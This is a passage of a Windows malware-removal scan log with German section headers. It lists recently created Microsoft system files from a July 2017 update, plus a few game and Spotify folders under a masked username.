2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-11 20:53 - 2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity
2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk
2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-07-05 21:32 - 2017-07-05 21:32 - 000000000 ____D C:\Users\****\AppData\Local\Hinterland
2017-07-05 21:27 - 2017-07-05 21:27 - 000000000 ____D C:\Users\****\AppData\LocalLow\Hinterland
2017-07-05 20:01 - 2017-07-05 20:01 - 000000222 _____ C:\Users\****\Desktop\The Long Dark.url

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-01 14:52 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify
